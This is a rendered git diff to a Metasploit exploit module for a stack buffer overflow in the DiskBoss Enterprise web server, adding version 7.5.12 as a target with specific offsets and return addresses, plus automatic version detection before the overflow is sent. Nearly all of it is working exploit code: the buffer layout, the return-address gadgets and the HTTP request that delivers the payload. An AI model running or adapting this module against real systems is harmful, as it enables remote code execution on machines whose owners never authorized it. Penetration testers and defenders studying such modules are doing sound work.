Add automatic targeting
Gabor Seljan
parent
d2472712f3
commit
9162374ae3
|
|
@ -16,10 +16,10 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
'Name' => 'DiskBoss Enterprise GET Buffer Overflow',
|
'Name' => 'DiskBoss Enterprise GET Buffer Overflow',
|
||||||
'Description' => %q{
|
'Description' => %q{
|
||||||
This module exploits a stack-based buffer overflow vulnerability
|
This module exploits a stack-based buffer overflow vulnerability
|
||||||
in the web interface of DiskBoss Enterprise v7.4.28, caused by
|
in the web interface of DiskBoss Enterprise v7.5.12 and v7.4.28,
|
||||||
improper bounds checking of the request path in HTTP GET requests
|
caused by improper bounds checking of the request path in HTTP GET
|
||||||
sent to the built-in web server. This module has been tested
|
requests sent to the built-in web server. This module has been
|
||||||
successfully on Windows XP SP3 and Windows 7 SP1.
|
tested successfully on Windows XP SP3 and Windows 7 SP1.
|
||||||
},
|
},
|
||||||
'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
'Author' =>
|
'Author' =>
|
||||||
|
|
@ -43,10 +43,21 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
},
|
},
|
||||||
'Targets' =>
|
'Targets' =>
|
||||||
[
|
[
|
||||||
|
['Automatic Targeting',
|
||||||
|
{
|
||||||
|
'auto' => true
|
||||||
|
}
|
||||||
|
],
|
||||||
[ 'DiskBoss Enterprise v7.4.28',
|
[ 'DiskBoss Enterprise v7.4.28',
|
||||||
{
|
{
|
||||||
'Offset' => 2471,
|
'Offset' => 2471,
|
||||||
'Ret' => 0x1004605c # ADD ESP,0x68 # RETN [Lgi.dll]
|
'Ret' => 0x1004605c # ADD ESP,0x68 # RETN [libpal.dll]
|
||||||
|
}
|
||||||
|
],
|
||||||
|
[ 'DiskBoss Enterprise v7.5.12',
|
||||||
|
{
|
||||||
|
'Offset' => 2471,
|
||||||
|
'Ret' => 0x100461da # ADD ESP,0x68 # RETN [libpal.dll]
|
||||||
}
|
}
|
||||||
]
|
]
|
||||||
],
|
],
|
||||||
|
|
@ -63,7 +74,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
})
|
})
|
||||||
|
|
||||||
if res && res.code == 200
|
if res && res.code == 200
|
||||||
if res.body =~ /DiskBoss Enterprise v7\.4\.28/
|
if res.body =~ /DiskBoss Enterprise v7\.(4\.28|5\.12)/
|
||||||
return Exploit::CheckCode::Vulnerable
|
return Exploit::CheckCode::Vulnerable
|
||||||
elsif res.body =~ /DiskBoss Enterprise/
|
elsif res.body =~ /DiskBoss Enterprise/
|
||||||
return Exploit::CheckCode::Detected
|
return Exploit::CheckCode::Detected
|
||||||
|
|
@ -77,10 +88,37 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
def exploit
|
def exploit
|
||||||
|
mytarget = target
|
||||||
|
|
||||||
|
if (target['auto'])
|
||||||
|
mytarget = nil
|
||||||
|
|
||||||
|
print_status("Automatically detecting the target...")
|
||||||
|
|
||||||
|
res = send_request_cgi({
|
||||||
|
'method' => 'GET',
|
||||||
|
'uri' => '/'
|
||||||
|
})
|
||||||
|
|
||||||
|
if res && res.code == 200
|
||||||
|
if res.body =~ /DiskBoss Enterprise v7\.4\.28/
|
||||||
|
mytarget = targets[1]
|
||||||
|
elsif res.body =~ /DiskBoss Enterprise v7\.5\.12/
|
||||||
|
mytarget = targets[2]
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
if (not mytarget)
|
||||||
|
fail_with(Failure::NoTarget, "No matching target")
|
||||||
|
end
|
||||||
|
|
||||||
|
print_status("Selected Target: #{mytarget.name}")
|
||||||
|
end
|
||||||
|
|
||||||
sploit = make_nops(21)
|
sploit = make_nops(21)
|
||||||
sploit << payload.encoded
|
sploit << payload.encoded
|
||||||
sploit << rand_text_alpha(target['Offset'] - payload.encoded.length)
|
sploit << rand_text_alpha(mytarget['Offset'] - payload.encoded.length)
|
||||||
sploit << [target.ret].pack('V')
|
sploit << [mytarget.ret].pack('V')
|
||||||
sploit << rand_text_alpha(2500)
|
sploit << rand_text_alpha(2500)
|
||||||
|
|
||||||
res = send_request_cgi({
|
res = send_request_cgi({
|
||||||
|
|
|
||||||
Loading…
Reference in New Issue